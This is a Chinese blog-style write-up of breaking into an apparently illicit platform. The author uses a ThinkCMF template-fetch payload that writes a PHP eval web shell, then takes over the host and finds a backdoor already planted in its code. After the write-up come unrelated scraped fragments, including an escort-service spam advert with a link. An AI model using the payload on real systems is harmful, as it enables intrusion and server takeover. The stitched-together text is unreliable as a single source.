记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程
拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。
进去之后在url处构造报错
查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" *** *** 521"]);?>')</php>
写入shell之后连接蚁剑,直接拿下
鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!
一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。
正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。
这。。。这TM。。。有人在代码里下毒。
拿着不知道是哪位好心人留下的后门,含泪登录了后台。
帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。
经常逛超市买酱油的小伙伴可能会留意到,酱油标签上的产品标准号,有的写着“低盐固态”,有的写着“高盐稀态”。那么挑酱油应该如何选好?提到高盐稀态?光看名字都说了“高盐”,那酱油的钠含量肯定高,而“低盐固...
12月6日,谷歌PageRank开始小范围更新,用不了多久全网都能看到更新状态,此次更新让我震惊,因为没人会料到它在今年还会更新。不出意外,这次更新大部分网站的PR都有提升。我博客几个分频道如站长新闻...
一、under 用于标示一个较为低的部位,意为“在(或到、根据)…下边”,比如: Have you looked under the bed? 你看看了床下边沒有? She place...
今天看了一天的天津爆炸新闻,流传正能量来了。。 这里不谈爆炸的缘故原由,不谈谁对谁错,就谈谈消防员。 也许某个主座发话了,赶快去救火,你就得去,硬着头皮也得上。 就像昨天晚上两点多,一群消防员被...
“深圳市哪有男个人伴游-【喻翠】” “深圳市绝品高档兼职模特在线预约資源:www.lmhack.com/by-sz/870.html”內容,由女学妹在线预约服务平台搜集整理3:根据日常生活的盆友,使他...
网站SEO标题在搜索引擎优化中,是极其重要的存在。它甚至决定了网站排名的速度,决定了网站排名的位置,决定了我们抓取的用户类型。下面就壹壹汇聚网络推广服务小编给大家培训一下标题,教你们如何写出,快速排名...